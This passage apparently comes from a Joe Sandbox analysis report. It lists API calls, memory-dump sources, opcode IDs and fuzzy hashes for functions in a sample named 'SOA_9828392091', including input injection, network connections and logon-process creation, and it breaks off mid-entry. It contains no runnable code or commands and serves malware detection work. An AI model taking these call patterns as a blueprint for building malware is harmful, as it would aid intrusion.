                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                      • String ID:
                                      • API String ID: 780911581-0
                                      • Opcode ID: 23cceebd792727ad8b6023719c265405ce73fdf457e04177411f7e5c314d4a10
                                      • Instruction ID: a7fd9b9174ebca5c436aad1cee370cd129f38838fc6fe316f6f2a25ed2297478
                                      • Opcode Fuzzy Hash: 23cceebd792727ad8b6023719c265405ce73fdf457e04177411f7e5c314d4a10
                                      • Instruction Fuzzy Hash: A1A15B756047019FDB14EF14C491B1AB7E9FF88710F14884AF99A9B3A2CB74ED44CB86
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyInitString
                                      • String ID:
                                      • API String ID: 2808897238-0
                                      • Opcode ID: 7af9d055e62cf45da4ae603a7d1b9396cd8ec4bc73d152b8fa2919ef9b4fa5d2
                                      • Instruction ID: c25f1d16de9d66ccb9d40a5653415a0da2c2f044c324fd72af05d12d67931bdc
                                      • Opcode Fuzzy Hash: 7af9d055e62cf45da4ae603a7d1b9396cd8ec4bc73d152b8fa2919ef9b4fa5d2
                                      • Instruction Fuzzy Hash: BE51A1306143069BDB24AF6AD895F2EB3EDEF85314F20881FE556CB3E1DB7498808B05
                                      APIs
                                      • GetWindowRect.USER32(01656B20,?), ref: 0099C544
                                      • ScreenToClient.USER32(?,00000002), ref: 0099C574
                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0099C5DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: 2feda4fcae812ff0e97d5201ac0772faf466ab0c2879c30ce4121f12127e9577
                                      • Instruction ID: bdefc95858d8f5be9641e3cd25330ffb4c3834a61d809357e0b0e1ca3d1bc65f
                                      • Opcode Fuzzy Hash: 2feda4fcae812ff0e97d5201ac0772faf466ab0c2879c30ce4121f12127e9577
                                      • Instruction Fuzzy Hash: 9B514DB5A04209EFCF20DF68CC80AAE7BB9EB59320F108659F9559B290D730ED41DB90
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0096C462
                                      • __itow.LIBCMT ref: 0096C49C
                                        • Part of subcall function 0096C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0096C753
                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0096C505
                                      • __itow.LIBCMT ref: 0096C55A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow
                                      • String ID:
                                      • API String ID: 3379773720-0
                                      • Opcode ID: d08532bcea1ecc0954d6dc280c724811115309220002f3930e93be8c61c7ab37
                                      • Instruction ID: 1c837980cef8a345831082d0aac015ef36282e86b4fc3b395bfeb32969b08faf
                                      • Opcode Fuzzy Hash: d08532bcea1ecc0954d6dc280c724811115309220002f3930e93be8c61c7ab37
                                      • Instruction Fuzzy Hash: 5941B4B1A04608AFDF21EF54CC51BFE7BB9AF89700F000029F946A7291DB709A45CFA1
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00973966
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00973982
                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009739EF
                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00973A4D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 5b3161cccc662e295142e252912b53c66296eb89261d5ff43e92b6c8143c1f26
                                      • Instruction ID: 7aaff01a7a1ca69f845d9cc714aa9a1812f17c0a24c1388acac24d52341c6dbf
                                      • Opcode Fuzzy Hash: 5b3161cccc662e295142e252912b53c66296eb89261d5ff43e92b6c8143c1f26
                                      • Instruction Fuzzy Hash: F0412972E14208EAEF348B648806BFDBBB9AB55310F04C11AF5C9521C1D7B58E85F765
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0099B5D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: 602dfd9189551a45b0b38b9afedb38ca6bd97986be8eb40c7501723f8df3a194
                                      • Instruction ID: a6c2462670fdbbfb31450b597491d8e9630f3db6741b08e79d3e78d67f0a19b3
                                      • Opcode Fuzzy Hash: 602dfd9189551a45b0b38b9afedb38ca6bd97986be8eb40c7501723f8df3a194
                                      • Instruction Fuzzy Hash: 8331BC74611208FBEF208F1CEE89FAC7769AB06320F654515FA51D62E1D738B940DB92
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 0099D807
                                      • GetWindowRect.USER32(?,?), ref: 0099D87D
                                      • PtInRect.USER32(?,?,0099ED5A), ref: 0099D88D
                                      • MessageBeep.USER32(00000000), ref: 0099D8FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: 29ca2b0bfd133c41ec181ffeb6c39dcbe085f0fed3d423e5ae632b337ed7d10b
                                      • Instruction ID: e4b004931952e34d93f16eb90d3810acdf4a9b802135a8a77c6a558d4e3f2eca
                                      • Opcode Fuzzy Hash: 29ca2b0bfd133c41ec181ffeb6c39dcbe085f0fed3d423e5ae632b337ed7d10b
                                      • Instruction Fuzzy Hash: 55418974A06219DFCF11DF5EC8C4BA97BB9BF49320F1881A9E814CB262D330E941DB80
                                      APIs
                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00973AB8
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00973AD4
                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00973B34
                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00973B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: cf58a92110b25f6f6f174b2c97419a67f7f81c4a3ba9b3219bf8eda95d3b898e
                                      • Instruction ID: 84b5b2be83a4244a3a589daad1d1d09391107b86eeabf13aa755e1a10c04a175
                                      • Opcode Fuzzy Hash: cf58a92110b25f6f6f174b2c97419a67f7f81c4a3ba9b3219bf8eda95d3b898e
                                      • Instruction Fuzzy Hash: C1315672A14258AEEF308B64C819BFE7BAD9B95320F04C21AF4C9932D1C7748F45E761
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00964038
                                      • __isleadbyte_l.LIBCMT ref: 00964066
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00964094
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009640CA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 7f253ec64f4eee8738aec6a66331c3cf508284e6b64ff4a6b1bec4f6af41567d
                                      • Instruction ID: 7895f3ec2efc430b0039c9117ea55153b9d5a8e028f196ac0665ad5c54d6a113
                                      • Opcode Fuzzy Hash: 7f253ec64f4eee8738aec6a66331c3cf508284e6b64ff4a6b1bec4f6af41567d
                                      • Instruction Fuzzy Hash: EE31EF30604226EFDB21DFB5C844BBB7BA9FF40320F158429EA618B1A1E731D890DB90
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00997CB9
                                        • Part of subcall function 00975F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00975F6F
                                        • Part of subcall function 00975F55: GetCurrentThreadId.KERNEL32 ref: 00975F76
                                        • Part of subcall function 00975F55: AttachThreadInput.USER32(00000000,?,0097781F), ref: 00975F7D
                                      • GetCaretPos.USER32(?), ref: 00997CCA
                                      • ClientToScreen.USER32(00000000,?), ref: 00997D03
                                      • GetForegroundWindow.USER32 ref: 00997D09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 28d4be597bc1b22b444438bbd5a3041a2692fc82d988017351ac6b0b97bf1830
                                      • Instruction ID: 0e46e6bdbec4c97ff541202c1720e0392d6526f13acb0acb95e7bc8821a88cd6
                                      • Opcode Fuzzy Hash: 28d4be597bc1b22b444438bbd5a3041a2692fc82d988017351ac6b0b97bf1830
                                      • Instruction Fuzzy Hash: 2C31F0B2D00108AFDB10EFA9D985DEFFBF9EF94314B118466F855E7211DA319E058BA0
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00984358
                                        • Part of subcall function 009843E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00984401
                                        • Part of subcall function 009843E2: InternetCloseHandle.WININET(00000000), ref: 0098449E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      • Opcode ID: e02a04c5756c655d1f49ca4d7e26116cdc4e8a5d2a71d777ac72f69ace301d97
                                      • Instruction ID: a796354bec3f49a7f75641ac6aa87d111b902aa2f67f1136315ef8092f28b7c2
                                      • Opcode Fuzzy Hash: e02a04c5756c655d1f49ca4d7e26116cdc4e8a5d2a71d777ac72f69ace301d97
                                      • Instruction Fuzzy Hash: BB21D171205606BBEB15AF60DE40FBBB7ADFF84710F10411BBA1596750EB719820AB90
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0096AFAE
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0096AFB5
                                      • CloseHandle.KERNEL32(00000004), ref: 0096AFCF
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0096AFFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 2621361867-0
                                      • Opcode ID: 21f255dbf1af808771f58e42cb31d36d1e1f8447d774bfe5a0dce07e5d9879a4
                                      • Instruction ID: f689628812f32b64cd94d650d433927f5286ce7d5919f9180c4b85f2467c295a
                                      • Opcode Fuzzy Hash: 21f255dbf1af808771f58e42cb31d36d1e1f8447d774bfe5a0dce07e5d9879a4
                                      • Instruction Fuzzy Hash: DA214CB2105209ABDF029F94EE49BEE7BA9AF44314F044125FA01A2161D37ADD61EB62
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00998AA6
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00998AC0
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00998ACE
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00998ADC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: 1f01df78051a24c8168c428bfe8e1a714c30313d0293f9a7d3b9f07a1a180d82
                                      • Instruction ID: ea88453023afe3811a6eb7c13240e55d908b0b1eddcad0fe252a4e1591c7bcfa
                                      • Opcode Fuzzy Hash: 1f01df78051a24c8168c428bfe8e1a714c30313d0293f9a7d3b9f07a1a180d82
                                      • Instruction Fuzzy Hash: 4C119031206115AFDB04AB18DC55FBB779DBF86320F144619F92AC72E2DB74AD018B94
                                      APIs
                                      • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00988AE0
                                      • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00988AF2
                                      • accept.WS2_32(00000000,00000000,00000000), ref: 00988AFF
                                      • WSAGetLastError.WS2_32(00000000), ref: 00988B16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLastacceptselect
                                      • String ID:
                                      • API String ID: 385091864-0
                                      • Opcode ID: a8a02894549d5e50c91dd1927598828dc5a0d329b8e4c6c14894d59728a1e292
                                      • Instruction ID: 31f70a7d83028f2a2448e923ec56f8db77f7d0a571d5f96ad1ae72b8c7875ae3
                                      • Opcode Fuzzy Hash: a8a02894549d5e50c91dd1927598828dc5a0d329b8e4c6c14894d59728a1e292
                                      • Instruction Fuzzy Hash: 97219672A011249FC7119F69C985ADEBBECEF89320F0041AAF849D7250DB749A418FA0
                                      APIs
                                        • Part of subcall function 00971E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00970ABB,?,?,?,0097187A,00000000,000000EF,00000119,?,?), ref: 00971E77
                                        • Part of subcall function 00971E68: lstrcpyW.KERNEL32(00000000,?,?,00970ABB,?,?,?,0097187A,00000000,000000EF,00000119,?,?,00000000), ref: 00971E9D
                                        • Part of subcall function 00971E68: lstrcmpiW.KERNEL32(00000000,?,00970ABB,?,?,?,0097187A,00000000,000000EF,00000119,?,?), ref: 00971ECE
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0097187A,00000000,000000EF,00000119,?,?,00000000), ref: 00970AD4
                                      • lstrcpyW.KERNEL32(00000000,?,?,0097187A,00000000,000000EF,00000119,?,?,00000000), ref: 00970AFA
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0097187A,00000000,000000EF,00000119,?,?,00000000), ref: 00970B2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: 99b94d8a6103ace16b9debdea597603eb50f7bc9f29a56e28458f42932f5f685
                                      • Instruction ID: 9aa223827898cb2d2fbe5de01860967f5b01923a7a6a06a80fef4afce8fc4ab0
                                      • Opcode Fuzzy Hash: 99b94d8a6103ace16b9debdea597603eb50f7bc9f29a56e28458f42932f5f685
                                      • Instruction Fuzzy Hash: FF118137210305EFDB25AF64DC45E7A77A8FF85354B80816AE80ACB290EB719950D7A1
                                      APIs
                                      • _free.LIBCMT ref: 00962FB5
                                        • Part of subcall function 0095395C: __FF_MSGBANNER.LIBCMT ref: 00953973
                                        • Part of subcall function 0095395C: __NMSG_WRITE.LIBCMT ref: 0095397A
                                        • Part of subcall function 0095395C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001), ref: 0095399F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      • Opcode ID: b897c8ab529bcf9339f68d20c8732dd0ed6fadd42b2e019c8803657f081d9f22
                                      • Instruction ID: 065f671174b4356648c818279f0dd216343475992270376bd734474fcef92945
                                      • Opcode Fuzzy Hash: b897c8ab529bcf9339f68d20c8732dd0ed6fadd42b2e019c8803657f081d9f22
                                      • Instruction Fuzzy Hash: 3C11CA31509612ABDB317FB1EC0576E7B9CAF843A1F208925FC899A152DB34C9449790
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009705AC
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009705C7
